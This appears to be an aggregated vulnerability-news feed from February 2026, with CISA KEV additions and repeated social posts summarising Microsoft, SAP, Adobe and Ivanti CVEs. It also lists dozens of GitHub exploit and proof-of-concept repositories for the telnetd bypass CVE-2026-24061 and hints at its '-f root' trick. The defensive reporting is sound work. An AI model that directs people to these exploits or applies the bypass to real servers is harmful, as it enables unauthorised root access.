Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T19:57:02
2 posts
π CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:35:21
1 posts
2 repos
π CVE-2026-1529 - High (8.1)
A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allow...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1529/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
3 posts
π¨ CVE-2026-21531: Critical RCE in Azure AI Language Authoring SDK v1.0.0 via deserialization of untrusted data. Unauthenticated attackers can execute code remotely. Restrict access & monitor endpoints until patched. https://radar.offseq.com/threat/cve-2026-21531-cwe-502-deserialization-of-untruste-4a5578f9 #OffSeq #Azure #Security
##π΄ CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
2 posts
π CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21537 - High (8.8)
Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
2 posts
π CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:53
2 posts
π CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
π CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
π CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
π CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
π CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
π CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
π CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
π CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
π CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
π CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:49
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T18:30:38
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T18:30:34
4 posts
59 repos
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/Good123321-bot/CVE-2026-24061-POC
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/z3n70/CVE-2026-24061
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/cumakurt/tscan
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/LucasPDiniz/CVE-2026-24061
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
https://github.com/h3athen/CVE-2026-24061
https://github.com/BrainBob/CVE-2026-24061
https://github.com/0x7556/CVE-2026-24061
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/SystemVll/CVE-2026-24061
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
https://github.com/scumfrog/cve-2026-24061
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/Good123321-bot/good123321-bot.github.io
https://github.com/Moxxic1/Tell-Me-Root
https://github.com/hackingyseguridad/root
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/Ali-brarou/telnest
https://github.com/xuemian168/CVE-2026-24061
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/franckferman/CVE_2026_24061_PoC
https://github.com/Moxxic1/moxxic1.github.io
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/balgan/CVE-2026-24061
https://github.com/typeconfused/CVE-2026-24061
https://github.com/infat0x/CVE-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/obrunolima1910/obrunolima1910.github.io
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/monstertsl/CVE-2026-24061
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/buzz075/CVE-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/hilwa24/CVE-2026-24061
I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep insideβ¦
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
ποΈ [Lobsec] https://link.is.it/6L9jY6
##I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep insideβ¦
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
ποΈ [Lobsec] https://link.is.it/6L9jY6
##updated 2026-02-10T15:22:54.740000
5 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
π₯ CVE-2026-0488 (CVSS 9.9): CRITICAL auth bypass in SAP CRM & S/4HANA Scripting Editor. Authenticated users can run arbitrary SQL, risking full DB compromise. Patch fast, restrict access! https://radar.offseq.com/threat/cve-2026-0488-cwe-862-missing-authorization-in-sap-cae5a650 #OffSeq #SAP #Vuln #ERP #Cybersecurity
##π΄ CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
π΄ CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
9 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
3674774 - [CVE-2026-0509] Missing Authorization check in SAP NetWeaver Application Server #ABAP and ABAP Platform
https://me.sap.com/notes/3674774
π‘οΈ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 β 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##π΄ CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
π‘οΈ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 β 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##π΄ CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
4 posts
π CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
π https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
π https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
π https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
π https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
π CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
π https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-40587 - High (7.6)
